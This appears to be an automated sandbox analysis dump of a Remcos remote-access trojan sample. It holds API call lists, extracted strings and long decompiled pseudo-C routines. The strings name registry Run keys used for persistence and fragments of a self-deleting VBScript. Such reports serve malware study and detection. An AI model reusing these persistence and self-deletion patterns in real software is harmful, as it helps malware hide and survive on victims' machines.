                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(00408832,00000000,?,0046C518,0046C500), ref: 00409DA6
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
                              • ExitProcess.KERNEL32 ref: 0040B45E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 3659626935-3677834288
                              • Opcode ID: 567856cb0eac3085822269a09f1429d21f775a8f17a796a089890433db4e469b
                              • Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
                              • Opcode Fuzzy Hash: 567856cb0eac3085822269a09f1429d21f775a8f17a796a089890433db4e469b
                              • Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E0044625D(signed int _a4, signed int _a8) {
                              				signed int _v0;
                              				signed char _v5;
                              				intOrPtr _v8;
                              				signed char _v9;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				intOrPtr _v24;
                              				signed int _v44;
                              				signed int _v92;
                              				signed int _v128;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t116;
                              				signed int _t119;
                              				signed int _t120;
                              				signed int _t122;
                              				signed int _t123;
                              				signed int _t126;
                              				signed int _t127;
                              				signed int _t131;
                              				signed int _t133;
                              				signed int _t136;
                              				signed int _t138;
                              				signed int _t139;
                              				signed int _t142;
                              				void* _t143;
                              				signed int _t148;
                              				signed int* _t150;
                              				signed int* _t156;
                              				signed int _t163;
                              				signed int _t165;
                              				signed int _t167;
                              				intOrPtr _t168;
                              				signed int _t173;
                              				signed int _t175;
                              				signed int _t176;
                              				signed int _t180;
                              				signed int _t185;
                              				intOrPtr* _t186;
                              				signed int _t191;
                              				signed int _t196;
                              				signed int _t197;
                              				signed int _t204;
                              				intOrPtr* _t205;
                              				signed int _t214;
                              				signed int _t215;
                              				signed int _t217;
                              				signed int _t218;
                              				signed int _t220;
                              				signed int _t221;
                              				signed int _t223;
                              				intOrPtr _t225;
                              				void* _t231;
                              				signed int _t233;
                              				void* _t236;
                              				signed int _t237;
                              				signed int _t238;
                              				void* _t241;
                              				signed int _t244;
                              				signed int _t246;
                              				void* _t252;
                              				signed int _t253;
                              				signed int _t254;
                              				void* _t260;
                              				void* _t262;
                              				signed int _t263;
                              				intOrPtr* _t267;
                              				intOrPtr* _t271;
                              				signed int _t274;
                              				signed int _t276;
                              				signed int _t280;
                              				signed int _t282;
                              				void* _t283;
                              				void* _t284;
                              				void* _t285;
                              				signed int _t286;
                              				signed int _t288;
                              				signed int _t290;
                              				signed int _t291;
                              				signed int* _t292;
                              				signed int _t298;
                              				signed int _t299;
                              				CHAR* _t300;
                              				signed int _t302;
                              				signed int _t303;
                              				WCHAR* _t304;
                              				signed int _t305;
                              				signed int _t306;
                              				signed int* _t307;
                              				signed int _t308;
                              				signed int _t310;
                              				void* _t316;
                              				void* _t317;
                              				void* _t318;
                              				void* _t320;
                              				void* _t321;
                              				void* _t322;
                              				void* _t323;
                              
                              				_t217 = _a4;
                              				if(_t217 != 0) {
                              					_t286 = _t217;
                              					_t116 = L00434870(_t217, 0x3d);
                              					_v16 = _t116;
                              					_t231 = _t285;
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						L10:
                              						 *((intOrPtr*)(L00439E14())) = 0x16;
                              						goto L11;
                              					} else {
                              						__eflags = _t116 - _t217;
                              						if(_t116 == _t217) {
                              							goto L10;
                              						} else {
                              							__eflags =  *((char*)(_t116 + 1));
                              							_t298 =  *0x46b4d0; // 0x2ea9f60
                              							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                              							_v5 = _t120;
                              							__eflags = _t298 -  *0x46b4dc; // 0x2ea9f60
                              							if(__eflags == 0) {
                              								L87();
                              								_t298 = _t120;
                              								_t120 = _v5;
                              								_t231 = _t298;
                              								 *0x46b4d0 = _t298;
                              							}
                              							_t218 = 0;
                              							__eflags = _t298;
                              							if(_t298 != 0) {
                              								L21:
                              								_t233 = _t286;
                              								_t122 = _v16 - _t233;
                              								_push(_t122);
                              								_push(_t233);
                              								L121();
                              								_v12 = _t122;
                              								__eflags = _t122;
                              								if(_t122 < 0) {
                              									L29:
                              									__eflags = _v5 - _t218;
                              									if(_v5 != _t218) {
                              										goto L12;
                              									} else {
                              										_t123 =  ~_t122;
                              										_v12 = _t123;
                              										_t27 = _t123 + 2; // 0x2
                              										_t236 = _t27;
                              										__eflags = _t236 - _t123;
                              										if(_t236 < _t123) {
                              											goto L11;
                              										} else {
                              											__eflags = _t236 - 0x3fffffff;
                              											if(_t236 >= 0x3fffffff) {
                              												goto L11;
                              											} else {
                              												_push(4);
                              												_push(_t236);
                              												_t299 = L00446905(_t298);
                              												L0043EE85(_t218);
                              												_t320 = _t320 + 0x10;
                              												__eflags = _t299;
                              												if(_t299 == 0) {
                              													goto L11;
                              												} else {
                              													_t237 = _v12;
                              													_t286 = _t218;
                              													_t126 = _a4;
                              													 *(_t299 + _t237 * 4) = _t126;
                              													 *(_t299 + 4 + _t237 * 4) = _t218;
                              													goto L34;
                              												}
                              											}
                              										}
                              									}
                              								} else {
                              									__eflags =  *_t298 - _t218;
                              									if( *_t298 == _t218) {
                              										goto L29;
                              									} else {
                              										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
                              										_t282 = _v12;
                              										__eflags = _v5 - _t218;
                              										if(_v5 != _t218) {
                              											while(1) {
                              												__eflags =  *(_t298 + _t282 * 4) - _t218;
                              												if( *(_t298 + _t282 * 4) == _t218) {
                              													break;
                              												}
                              												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                              												_t282 = _t282 + 1;
                              												__eflags = _t282;
                              											}
                              											_push(4);
                              											_push(_t282);
                              											_t299 = L00446905(_t298);
                              											L0043EE85(_t218);
                              											_t320 = _t320 + 0x10;
                              											_t126 = _t286;
                              											__eflags = _t299;
                              											if(_t299 != 0) {
                              												L34:
                              												 *0x46b4d0 = _t299;
                              											}
                              										} else {
                              											_t126 = _a4;
                              											_t286 = _t218;
                              											 *(_t298 + _t282 * 4) = _t126;
                              										}
                              										__eflags = _a8 - _t218;
                              										if(_a8 == _t218) {
                              											goto L12;
                              										} else {
                              											_t238 = _t126;
                              											_t283 = _t238 + 1;
                              											do {
                              												_t127 =  *_t238;
                              												_t238 = _t238 + 1;
                              												__eflags = _t127;
                              											} while (_t127 != 0);
                              											_v12 = _t238 - _t283 + 2;
                              											_t300 = L0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
                              											_pop(_t241);
                              											__eflags = _t300;
                              											if(_t300 == 0) {
                              												L42:
                              												L0043EE85(_t300);
                              												goto L12;
                              											} else {
                              												_t131 = L004405A6(_t300, _v12, _a4);
                              												_t321 = _t320 + 0xc;
                              												__eflags = _t131;
                              												if(_t131 != 0) {
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													_push(_t218);
                              													E0043629A();
                              													asm("int3");
                              													_t316 = _t321;
                              													_t322 = _t321 - 0xc;
                              													_push(_t218);
                              													_t220 = _v44;
                              													__eflags = _t220;
                              													if(_t220 != 0) {
                              														_push(_t300);
                              														_push(_t286);
                              														_push(0x3d);
                              														_t288 = _t220;
                              														_t133 = L00450867(_t241);
                              														_v20 = _t133;
                              														_t244 = _t220;
                              														__eflags = _t133;
                              														if(_t133 == 0) {
                              															L54:
                              															 *((intOrPtr*)(L00439E14())) = 0x16;
                              															goto L55;
                              														} else {
                              															__eflags = _t133 - _t220;
                              															if(_t133 == _t220) {
                              																goto L54;
                              															} else {
                              																_t302 =  *0x46b4d4; // 0x2ebce48
                              																_t221 = 0;
                              																__eflags =  *(_t133 + 2);
                              																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                              																_v9 = _t246;
                              																__eflags = _t302 -  *0x46b4d8; // 0x2ebcfa8
                              																if(__eflags == 0) {
                              																	_push(_t302);
                              																	L104();
                              																	_t246 = _v9;
                              																	_t302 = _t133;
                              																	 *0x46b4d4 = _t302;
                              																}
                              																__eflags = _t302;
                              																if(_t302 != 0) {
                              																	L64:
                              																	_v20 = _v20 - _t288 >> 1;
                              																	_t138 = L00446898(_t288, _v20 - _t288 >> 1);
                              																	_v16 = _t138;
                              																	__eflags = _t138;
                              																	if(_t138 < 0) {
                              																		L72:
                              																		__eflags = _v9 - _t221;
                              																		if(_v9 != _t221) {
                              																			goto L56;
                              																		} else {
                              																			_t139 =  ~_t138;
                              																			_v16 = _t139;
                              																			_t72 = _t139 + 2; // 0x2
                              																			_t252 = _t72;
                              																			__eflags = _t252 - _t139;
                              																			if(_t252 < _t139) {
                              																				goto L55;
                              																			} else {
                              																				__eflags = _t252 - 0x3fffffff;
                              																				if(_t252 >= 0x3fffffff) {
                              																					goto L55;
                              																				} else {
                              																					_push(4);
                              																					_push(_t252);
                              																					_t303 = L00446905(_t302);
                              																					L0043EE85(_t221);
                              																					_t322 = _t322 + 0x10;
                              																					__eflags = _t303;
                              																					if(_t303 == 0) {
                              																						goto L55;
                              																					} else {
                              																						_t253 = _v16;
                              																						_t288 = _t221;
                              																						_t142 = _v0;
                              																						 *(_t303 + _t253 * 4) = _t142;
                              																						 *(_t303 + 4 + _t253 * 4) = _t221;
                              																						goto L77;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	} else {
                              																		__eflags =  *_t302 - _t221;
                              																		if( *_t302 == _t221) {
                              																			goto L72;
                              																		} else {
                              																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
                              																			_t276 = _v16;
                              																			__eflags = _v9 - _t221;
                              																			if(_v9 != _t221) {
                              																				while(1) {
                              																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                              																					if( *(_t302 + _t276 * 4) == _t221) {
                              																						break;
                              																					}
                              																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                              																					_t276 = _t276 + 1;
                              																					__eflags = _t276;
                              																				}
                              																				_push(4);
                              																				_push(_t276);
                              																				_t303 = L00446905(_t302);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0x10;
                              																				_t142 = _t288;
                              																				__eflags = _t303;
                              																				if(_t303 != 0) {
                              																					L77:
                              																					 *0x46b4d4 = _t303;
                              																				}
                              																			} else {
                              																				_t142 = _v0;
                              																				_t288 = _t221;
                              																				 *(_t302 + _t276 * 4) = _t142;
                              																			}
                              																			__eflags = _a4 - _t221;
                              																			if(_a4 == _t221) {
                              																				goto L56;
                              																			} else {
                              																				_t254 = _t142;
                              																				_t81 = _t254 + 2; // 0x2
                              																				_t284 = _t81;
                              																				do {
                              																					_t143 =  *_t254;
                              																					_t254 = _t254 + 2;
                              																					__eflags = _t143 - _t221;
                              																				} while (_t143 != _t221);
                              																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                              																				_v16 = _t82;
                              																				_t304 = L0043DFD9(_t254 - _t284 >> 1, _t82, 2);
                              																				_pop(_t258);
                              																				__eflags = _t304;
                              																				if(_t304 == 0) {
                              																					L85:
                              																					L0043EE85(_t304);
                              																					goto L56;
                              																				} else {
                              																					_t148 = E00440264(_t304, _v16, _v0);
                              																					_t323 = _t322 + 0xc;
                              																					__eflags = _t148;
                              																					if(_t148 != 0) {
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						_push(_t221);
                              																						E0043629A();
                              																						asm("int3");
                              																						_push(_t316);
                              																						_t317 = _t323;
                              																						_push(_t288);
                              																						_t290 = _v92;
                              																						__eflags = _t290;
                              																						if(_t290 != 0) {
                              																							_t260 = 0;
                              																							_t150 = _t290;
                              																							__eflags =  *_t290;
                              																							if( *_t290 != 0) {
                              																								do {
                              																									_t150 =  &(_t150[1]);
                              																									_t260 = _t260 + 1;
                              																									__eflags =  *_t150;
                              																								} while ( *_t150 != 0);
                              																							}
                              																							_t305 = L0043DFD9(_t260, _t260 + 1, 4);
                              																							_t262 = _t304;
                              																							__eflags = _t305;
                              																							if(_t305 == 0) {
                              																								L102:
                              																								L0043E5DA(_t221, _t284, _t290, _t305);
                              																								goto L103;
                              																							} else {
                              																								__eflags =  *_t290;
                              																								if( *_t290 == 0) {
                              																									L100:
                              																									L0043EE85(0);
                              																									_t175 = _t305;
                              																									goto L101;
                              																								} else {
                              																									_push(_t221);
                              																									_t221 = _t305 - _t290;
                              																									__eflags = _t221;
                              																									do {
                              																										_t271 =  *_t290;
                              																										_t284 = _t271 + 1;
                              																										do {
                              																											_t176 =  *_t271;
                              																											_t271 = _t271 + 1;
                              																											__eflags = _t176;
                              																										} while (_t176 != 0);
                              																										_t262 = _t271 - _t284;
                              																										_v16 = _t262 + 1;
                              																										 *(_t221 + _t290) = L0043DFD9(_t262, _t262 + 1, 1);
                              																										L0043EE85(0);
                              																										_t323 = _t323 + 0xc;
                              																										__eflags =  *(_t221 + _t290);
                              																										if( *(_t221 + _t290) == 0) {
                              																											goto L102;
                              																										} else {
                              																											_t180 = L004405A6( *(_t221 + _t290), _v16,  *_t290);
                              																											_t323 = _t323 + 0xc;
                              																											__eflags = _t180;
                              																											if(_t180 != 0) {
                              																												L103:
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												_push(0);
                              																												E0043629A();
                              																												asm("int3");
                              																												_push(_t317);
                              																												_t318 = _t323;
                              																												_push(_t262);
                              																												_push(_t262);
                              																												_push(_t290);
                              																												_t291 = _v128;
                              																												__eflags = _t291;
                              																												if(_t291 != 0) {
                              																													_push(_t221);
                              																													_t223 = 0;
                              																													_t156 = _t291;
                              																													_t263 = 0;
                              																													_v20 = 0;
                              																													_push(_t305);
                              																													__eflags =  *_t291;
                              																													if( *_t291 != 0) {
                              																														do {
                              																															_t156 =  &(_t156[1]);
                              																															_t263 = _t263 + 1;
                              																															__eflags =  *_t156;
                              																														} while ( *_t156 != 0);
                              																													}
                              																													_t306 = L0043DFD9(_t263, _t263 + 1, 4);
                              																													__eflags = _t306;
                              																													if(_t306 == 0) {
                              																														L119:
                              																														L0043E5DA(_t223, _t284, _t291, _t306);
                              																														goto L120;
                              																													} else {
                              																														__eflags =  *_t291 - _t223;
                              																														if( *_t291 == _t223) {
                              																															L117:
                              																															L0043EE85(_t223);
                              																															_t167 = _t306;
                              																															goto L118;
                              																														} else {
                              																															_t223 = _t306 - _t291;
                              																															__eflags = _t223;
                              																															do {
                              																																_t267 =  *_t291;
                              																																_t284 = _t267 + 2;
                              																																do {
                              																																	_t168 =  *_t267;
                              																																	_t267 = _t267 + 2;
                              																																	__eflags = _t168 - _v20;
                              																																} while (_t168 != _v20);
                              																																_v24 = (_t267 - _t284 >> 1) + 1;
                              																																 *(_t223 + _t291) = L0043DFD9(_t267 - _t284 >> 1, (_t267 - _t284 >> 1) + 1, 2);
                              																																L0043EE85(0);
                              																																_t323 = _t323 + 0xc;
                              																																__eflags =  *(_t223 + _t291);
                              																																if( *(_t223 + _t291) == 0) {
                              																																	goto L119;
                              																																} else {
                              																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
                              																																	_t323 = _t323 + 0xc;
                              																																	__eflags = _t173;
                              																																	if(_t173 != 0) {
                              																																		L120:
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		_push(0);
                              																																		E0043629A();
                              																																		asm("int3");
                              																																		_push(_t318);
                              																																		_push(_t223);
                              																																		_push(_t306);
                              																																		_push(_t291);
                              																																		_t292 =  *0x46b4d0;
                              																																		_t307 = _t292;
                              																																		__eflags =  *_t292;
                              																																		if( *_t292 == 0) {
                              																																			L127:
                              																																			_t308 = _t307 - _t292;
                              																																			__eflags = _t308;
                              																																			_t310 =  ~(_t308 >> 2);
                              																																		} else {
                              																																			_t225 = _v8;
                              																																			do {
                              																																				_t163 = E00443141(_v12,  *_t307, _t225);
                              																																				_t323 = _t323 + 0xc;
                              																																				__eflags = _t163;
                              																																				if(_t163 != 0) {
                              																																					goto L126;
                              																																				} else {
                              																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                              																																					__eflags = _t165 - 0x3d;
                              																																					if(_t165 == 0x3d) {
                              																																						L129:
                              																																						_t310 = _t307 - _t292 >> 2;
                              																																					} else {
                              																																						__eflags = _t165;
                              																																						if(_t165 == 0) {
                              																																							goto L129;
                              																																						} else {
                              																																							goto L126;
                              																																						}
                              																																					}
                              																																				}
                              																																				goto L128;
                              																																				L126:
                              																																				_t307 =  &(_t307[1]);
                              																																				__eflags =  *_t307;
                              																																			} while ( *_t307 != 0);
                              																																			goto L127;
                              																																		}
                              																																		L128:
                              																																		return _t310;
                              																																	} else {
                              																																		goto L115;
                              																																	}
                              																																}
                              																																goto L130;
                              																																L115:
                              																																_t291 = _t291 + 4;
                              																																__eflags =  *_t291 - _t173;
                              																															} while ( *_t291 != _t173);
                              																															_t223 = 0;
                              																															__eflags = 0;
                              																															goto L117;
                              																														}
                              																													}
                              																												} else {
                              																													_t167 = 0;
                              																													L118:
                              																													return _t167;
                              																												}
                              																											} else {
                              																												goto L98;
                              																											}
                              																										}
                              																										goto L130;
                              																										L98:
                              																										_t290 = _t290 + 4;
                              																										__eflags =  *_t290 - _t180;
                              																									} while ( *_t290 != _t180);
                              																									goto L100;
                              																								}
                              																							}
                              																						} else {
                              																							_t175 = 0;
                              																							L101:
                              																							return _t175;
                              																						}
                              																					} else {
                              																						_t274 =  &(_t304[_v20 + 1]);
                              																						 *(_t274 - 2) = _t148;
                              																						asm("sbb eax, eax");
                              																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                              																						__eflags = _t185;
                              																						if(_t185 == 0) {
                              																							_t186 = L00439E14();
                              																							_t221 = _t221 | 0xffffffff;
                              																							__eflags = _t221;
                              																							 *_t186 = 0x2a;
                              																						}
                              																						goto L85;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	}
                              																} else {
                              																	_t191 =  *0x46b4d0; // 0x2ea9f60
                              																	__eflags = _a4 - _t221;
                              																	if(_a4 == _t221) {
                              																		L58:
                              																		__eflags = _t246;
                              																		if(_t246 != 0) {
                              																			goto L56;
                              																		} else {
                              																			__eflags = _t191;
                              																			if(_t191 != 0) {
                              																				L62:
                              																				 *0x46b4d4 = L0043DFD9(_t246, 1, 4);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0xc;
                              																				goto L63;
                              																			} else {
                              																				 *0x46b4d0 = L0043DFD9(_t246, 1, 4);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0xc;
                              																				__eflags =  *0x46b4d0 - _t221; // 0x2ea9f60
                              																				if(__eflags == 0) {
                              																					goto L55;
                              																				} else {
                              																					_t302 =  *0x46b4d4; // 0x2ebce48
                              																					__eflags = _t302;
                              																					if(_t302 != 0) {
                              																						goto L64;
                              																					} else {
                              																						goto L62;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	} else {
                              																		__eflags = _t191;
                              																		if(_t191 == 0) {
                              																			goto L58;
                              																		} else {
                              																			_t196 = L0043C07A(_t221);
                              																			__eflags = _t196;
                              																			if(_t196 != 0) {
                              																				L63:
                              																				_t302 =  *0x46b4d4; // 0x2ebce48
                              																				__eflags = _t302;
                              																				if(_t302 == 0) {
                              																					L55:
                              																					_t221 = _t220 | 0xffffffff;
                              																					__eflags = _t221;
                              																					L56:
                              																					L0043EE85(_t288);
                              																					_t136 = _t221;
                              																					goto L57;
                              																				} else {
                              																					goto L64;
                              																				}
                              																			} else {
                              																				goto L54;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t197 = L00439E14();
                              														 *_t197 = 0x16;
                              														_t136 = _t197 | 0xffffffff;
                              														L57:
                              														return _t136;
                              													}
                              												} else {
                              													_t280 = _v16 + 1 + _t300 - _a4;
                              													asm("sbb eax, eax");
                              													 *(_t280 - 1) = _t218;
                              													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                              													__eflags = _t204;
                              													if(_t204 == 0) {
                              														_t205 = L00439E14();
                              														_t218 = _t218 | 0xffffffff;
                              														__eflags = _t218;
                              														 *_t205 = 0x2a;
                              													}
                              													goto L42;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							} else {
                              								__eflags = _a8;
                              								if(_a8 == 0) {
                              									L14:
                              									__eflags = _t120;
                              									if(_t120 == 0) {
                              										 *0x46b4d0 = L0043DFD9(_t231, 1, 4);
                              										L0043EE85(_t218);
                              										_t298 =  *0x46b4d0; // 0x2ea9f60
                              										_t320 = _t320 + 0xc;
                              										__eflags = _t298;
                              										if(_t298 == 0) {
                              											goto L11;
                              										} else {
                              											__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
                              											if(__eflags != 0) {
                              												goto L20;
                              											} else {
                              												 *0x46b4d4 = L0043DFD9(_t231, 1, 4);
                              												L0043EE85(_t218);
                              												_t320 = _t320 + 0xc;
                              												__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
                              												if(__eflags == 0) {
                              													goto L11;
                              												} else {
                              													goto L19;
                              												}
                              											}
                              										}
                              									} else {
                              										_t218 = 0;
                              										goto L12;
                              									}
                              								} else {
                              									__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
                              									if(__eflags == 0) {
                              										goto L14;
                              									} else {
                              										_t214 = L0043C075(0);
                              										__eflags = _t214;
                              										if(_t214 != 0) {
                              											L19:
                              											_t298 =  *0x46b4d0; // 0x2ea9f60
                              											L20:
                              											__eflags = _t298;
                              											if(_t298 == 0) {
                              												L11:
                              												_t218 = _t217 | 0xffffffff;
                              												__eflags = _t218;
                              												L12:
                              												L0043EE85(_t286);
                              												_t119 = _t218;
                              												goto L13;
                              											} else {
                              												goto L21;
                              											}
                              										} else {
                              											goto L10;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				} else {
                              					_t215 = L00439E14();
                              					 *_t215 = 0x16;
                              					_t119 = _t215 | 0xffffffff;
                              					L13:
                              					return _t119;
                              				}
                              				L130:
                              			}

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Similarity
                              • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                              • String ID:
                              • API String ID: 2719235668-0
                              • Opcode ID: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
                              • Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
                              • Opcode Fuzzy Hash: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
                              • Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				signed int _v8;
                              				char _v21;
                              				intOrPtr _v22;
                              				struct _cpinfo _v28;
                              				void* _v32;
                              				void* _v36;
                              				void* _v40;
                              				intOrPtr* _v44;
                              				signed int _v48;
                              				void* _v52;
                              				signed int* _v56;
                              				intOrPtr _v60;
                              				intOrPtr* _v64;
                              				signed int* _v68;
                              				void* _v72;
                              				char _v76;
                              				signed int _t101;
                              				signed int _t123;
                              				signed short _t126;
                              				void* _t130;
                              				void* _t134;
                              				void* _t137;
                              				void* _t138;
                              				intOrPtr _t139;
                              				void* _t141;
                              				signed int _t142;
                              				intOrPtr* _t143;
                              				signed char _t160;
                              				signed char _t165;
                              				signed int _t166;
                              				void* _t168;
                              				signed int _t170;
                              				void* _t179;
                              				signed int* _t180;
                              				signed int* _t181;
                              				signed int _t182;
                              				signed char* _t189;
                              				signed char* _t190;
                              				signed int _t192;
                              				void* _t193;
                              				intOrPtr _t197;
                              				short* _t209;
                              				intOrPtr* _t211;
                              				intOrPtr* _t215;
                              				signed int _t216;
                              				signed int _t217;
                              				void* _t218;
                              				void* _t219;
                              
                              				_t101 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t101 ^ _t217;
                              				_t211 = _a4;
                              				_t170 = 0;
                              				_v64 = _t211;
                              				_v32 = 0;
                              				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                              				_v36 = 0;
                              				_v40 = 0;
                              				_v52 = 0;
                              				_v76 = _t211;
                              				_v72 = 0;
                              				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                              					__eflags =  *(_t211 + 0x8c);
                              					if( *(_t211 + 0x8c) != 0) {
                              						asm("lock dec dword [eax]");
                              					}
                              					 *(_t211 + 0x8c) = _t170;
                              					__eflags = 0;
                              					 *(_t211 + 0x90) = _t170;
                              					 *_t211 = 0x4577a8;
                              					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
                              					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
                              					 *((intOrPtr*)(_t211 + 4)) = 1;
                              					L41:
                              					return L0042F61B(_v8 ^ _t217);
                              				}
                              				_t106 = _t211 + 8;
                              				_v44 = 0;
                              				if( *(_t211 + 8) != 0) {
                              					L3:
                              					_v44 = L0043DFD9(_t172, 1, 4);
                              					L0043EE85(_t170);
                              					_v32 = L0043DFD9(_t172, 0x180, 2);
                              					L0043EE85(_t170);
                              					_v36 = L0043DFD9(_t172, 0x180, 1);
                              					L0043EE85(_t170);
                              					_v40 = L0043DFD9(_t172, 0x180, 1);
                              					L0043EE85(_t170);
                              					_t197 = L0043DFD9(_t172, 0x101, 1);
                              					_v52 = _t197;
                              					L0043EE85(_t170);
                              					_t219 = _t218 + 0x3c;
                              					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                              						L36:
                              						L0043EE85(_v44);
                              						L0043EE85(_v32);
                              						L0043EE85(_v36);
                              						L0043EE85(_v40);
                              						_t170 = 1;
                              						__eflags = 1;
                              						goto L37;
                              					} else {
                              						_t123 = _t170;
                              						do {
                              							 *(_t123 + _t197) = _t123;
                              							_t123 = _t123 + 1;
                              						} while (_t123 < 0x100);
                              						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                              							goto L36;
                              						}
                              						_t126 = _v28;
                              						_t235 = _t126 - 5;
                              						if(_t126 > 5) {
                              							goto L36;
                              						}
                              						_t28 = _t197 + 1; // 0x1
                              						_v48 = _t126 & 0x0000ffff;
                              						_t192 = 0xff;
                              						_t130 = L0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                              						_t219 = _t219 + 0x24;
                              						_t236 = _t130;
                              						if(_t130 == 0) {
                              							goto L36;
                              						}
                              						_t34 = _t197 + 1; // 0x1
                              						_t134 = L0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                              						_t219 = _t219 + 0x24;
                              						if(_t134 == 0) {
                              							goto L36;
                              						}
                              						if(_v48 <= 1 || _v22 == _t170) {
                              							L22:
                              							_v60 = _v32 + 0x100;
                              							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                              							_t219 = _t219 + 0x1c;
                              							if(_t137 == 0) {
                              								goto L36;
                              							}
                              							_t193 = _v32;
                              							_t138 = _t193 + 0xfe;
                              							 *_t138 = 0;
                              							_t179 = _v36;
                              							_v32 = _t138;
                              							_t139 = _v40;
                              							 *(_t179 + 0x7f) = _t170;
                              							_t180 = _t179 - 0xffffff80;
                              							 *(_t139 + 0x7f) = _t170;
                              							_v68 = _t180;
                              							 *_t180 = _t170;
                              							_t181 = _t139 + 0x80;
                              							_v56 = _t181;
                              							 *_t181 = _t170;
                              							if(_v48 <= 1 || _v22 == _t170) {
                              								L32:
                              								_t182 = 0x3f;
                              								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                              								_push(0x1f);
                              								asm("movsw");
                              								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                              								_push(0x1f);
                              								asm("movsw");
                              								asm("movsb");
                              								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                              								asm("movsw");
                              								asm("movsb");
                              								_t215 = _v64;
                              								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                              									asm("lock xadd [ecx], eax");
                              									if((_t142 | 0xffffffff) == 0) {
                              										L0043EE85( *(_t215 + 0x90) - 0xfe);
                              										L0043EE85( *(_t215 + 0x94) - 0x80);
                              										L0043EE85( *(_t215 + 0x98) - 0x80);
